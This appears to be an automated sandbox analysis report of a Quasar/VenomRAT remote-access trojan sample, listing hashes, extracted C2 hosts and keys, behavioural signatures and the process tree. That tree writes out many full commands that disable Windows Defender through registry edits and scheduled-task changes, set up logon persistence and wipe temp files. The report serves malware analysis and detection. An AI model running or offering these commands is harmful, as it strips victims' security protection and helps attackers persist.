Analysis
-
max time kernel
4294191s -
max time network
155s -
platform
windows7_x64 -
resource
win7-20220223-en -
submitted
10-03-2022 18:45
General
-
Target
50a1c7fe95af7c0af2cc5c21c62faf10e63f4076004e8508b608385aad5be3b6.exe
-
Size
9.4MB
-
MD5
456b54d87d22a2c59cb44ae3e29940a3
-
SHA1
4eb16df152f774f3794a6ca8c1cd1a3e72bc7232
-
SHA256
50a1c7fe95af7c0af2cc5c21c62faf10e63f4076004e8508b608385aad5be3b6
-
SHA512
8213a726aeee1519599e6884f6ad4564d5df066251267d630af4e601bef2b726a2445855e0a609f088c26c84b4cae69e26cc3d744668bf882ff46cb29684cc6d
Score
10/10
Malware Config
Extracted
Family
quasar
Version
2.1.0.0
Botnet
Windows Security Notification
C2
minecraftgaming009-61323.portmap.io:61323
Mutex
VNM_MUTEX_c2q7y2ayYutZ2XaYe7
Attributes
-
encryption_key
1oSvdU99XhcwnNYl3rB8
-
install_name
Windows Security Notification.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Windows Security Notification
-
subdirectory
SubDir
Extracted
Family
quasar
Version
1.4.0.0
Botnet
Steam
C2
Minecrafthosting6969-35389.portmap.io:35389
Mutex
EAojkiVMQ0sDtyACyi
Attributes
-
encryption_key
P5xHRD8P5ncR2T1uRpgp
-
install_name
Steam.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Steam
-
subdirectory
SubDir
Signatures
-
Contains code to disable Windows Defender 13 IoCs
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
-
Modifies Windows Defender Real-time Protection settings 3 TTPs
-
Modifies security service 2 TTPs 1 IoCs
-
Quasar Payload 14 IoCs
-
Quasar RAT 4 IoCs
Quasar is an open source Remote Access Tool.
-
VenomRAT
VenomRAT is a modified version of QuasarRAT with some added features, such as rootkit and stealer capabilites.
-
NirSoft WebBrowserPassView 1 IoCs
Password recovery tool for various web browsers
-
Nirsoft 2 IoCs
-
Executes dropped EXE 10 IoCs
-
Deletes itself 1 IoCs
-
Drops startup file 2 IoCs
-
Loads dropped DLL 22 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Windows security modification 2 TTPs 2 IoCs
-
Adds Run key to start application 2 TTPs 3 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Drops file in System32 directory 5 IoCs
-
Detects Pyinstaller 6 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 2 IoCs
-
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies system certificate store 2 TTPs 5 IoCs
-
Runs ping.exe 1 TTPs 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 10 IoCs
-
Suspicious use of AdjustPrivilegeToken 9 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\50a1c7fe95af7c0af2cc5c21c62faf10e63f4076004e8508b608385aad5be3b6.exe"C:\Users\Admin\AppData\Local\Temp\50a1c7fe95af7c0af2cc5c21c62faf10e63f4076004e8508b608385aad5be3b6.exe"1⤵
- Quasar RAT
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Abxy.exe"C:\Users\Admin\AppData\Local\Temp\Abxy.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Abxy.exe"C:\Users\Admin\AppData\Local\Temp\Abxy.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
-
-
-
C:\Users\Admin\AppData\Local\Temp\Ygri.exe"C:\Users\Admin\AppData\Local\Temp\Ygri.exe"2⤵
- Executes dropped EXE
- Drops startup file
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe"C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe" ZhXl39BlhP84+Y4kurA8wpehxxqA0X22IMYZ6Vpiqs4EpeebWszwq3L5jgvisNmyvGbyVAfjjb/WhkVRHM1jSY9bDQBPQUlA+KOt+q65oQzJt9yxASNarn9KPWpl7VpeJNaoB2sh/pMWGpfd1hNghc5haR0kkZkRiX8yULrHRxs=3⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\compile.vbs"4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c compile.bat5⤵
-
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\compile.vbs"4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c compile.bat5⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\dav.bat"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exereg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f4⤵
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f4⤵
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f4⤵
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f4⤵
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f4⤵
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f4⤵
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f4⤵
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f4⤵
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f4⤵
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f4⤵
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f┬┤4⤵
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f4⤵
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f4⤵
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f4⤵
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f4⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable4⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable4⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable4⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable4⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable4⤵
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f4⤵
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f4⤵
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f4⤵
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f4⤵
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f4⤵
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f4⤵
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f4⤵
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f4⤵
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f4⤵
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f4⤵
- Modifies security service
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Eseycozeqlmrj.exe"C:\Users\Admin\AppData\Local\Temp\Eseycozeqlmrj.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 572 -s 10803⤵
- Loads dropped DLL
- Program crash
-
-
-
C:\Users\Admin\AppData\Local\Temp\Ivyptgekvxzzxq.exe"C:\Users\Admin\AppData\Local\Temp\Ivyptgekvxzzxq.exe"2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Steam" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Ivyptgekvxzzxq.exe" /rl HIGHEST /f3⤵
- Creates scheduled task(s)
-
-
C:\Users\Admin\AppData\Roaming\SubDir\Steam.exe"C:\Users\Admin\AppData\Roaming\SubDir\Steam.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Steam" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Steam.exe" /rl HIGHEST /f4⤵
- Creates scheduled task(s)
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Zutrnxofihoxqy.exe"C:\Users\Admin\AppData\Local\Temp\Zutrnxofihoxqy.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Windows security modification
- Adds Run key to start application
- Drops file in System32 directory
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "Windows Security Notification" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Zutrnxofihoxqy.exe" /rl HIGHEST /f3⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\SubDir\Windows Security Notification.exe"C:\Windows\SysWOW64\SubDir\Windows Security Notification.exe"3⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "Windows Security Notification" /sc ONLOGON /tr "C:\Windows\SysWOW64\SubDir\Windows Security Notification.exe" /rl HIGHEST /f4⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\URFSHxQetleU.bat" "4⤵
-
C:\Windows\SysWOW64\chcp.comchcp 650015⤵
-
-
C:\Windows\SysWOW64\PING.EXEping -n 10 localhost5⤵
- Runs ping.exe
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1924 -s 15124⤵
- Loads dropped DLL
- Program crash
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k start /b del /q/f/s %TEMP%\* & exit3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K del /q/f/s C:\Users\Admin\AppData\Local\Temp\*4⤵
- Deletes itself
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\ASQ53bPd3e32.bat" "3⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\chcp.comchcp 650014⤵
-
-
C:\Windows\SysWOW64\PING.EXEping -n 10 localhost4⤵
- Runs ping.exe
-
-
C:\Users\Admin\AppData\Local\Temp\Zutrnxofihoxqy.exe"C:\Users\Admin\AppData\Local\Temp\Zutrnxofihoxqy.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
4KB
-
Filesize
6.9MB
-
Filesize
3.0MB
-
Filesize
3.0MB
-
Filesize
6.9MB
-
Filesize
600KB
-
Filesize
4KB
-
Filesize
32KB
-
Filesize
8KB
-
Filesize
6.9MB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
12.3MB
-
Filesize
5.7MB
-
Filesize
5.7MB
-
Filesize
12.3MB
-
Filesize
12.3MB
-
Filesize
9.9MB
-
Filesize
8KB
-
Filesize
144KB
-
Filesize
3.3MB
-
Filesize
24KB
-
Filesize
200KB
-
Filesize
648KB
-
Filesize
32KB
-
Filesize
48KB
-
Filesize
192KB
-
Filesize
104KB
-
Filesize
704KB
-
Filesize
8KB
-
Filesize
2.9MB
-
Filesize
9.9MB
-
Filesize
144KB
-
Filesize
9.9MB
-
Filesize
424KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
9.9MB
-
Filesize
600KB
-
Filesize
9.5MB
-
Filesize
6.9MB
-
Filesize
8KB
-
Filesize
600KB
-
Filesize
6.9MB
-
Filesize
4KB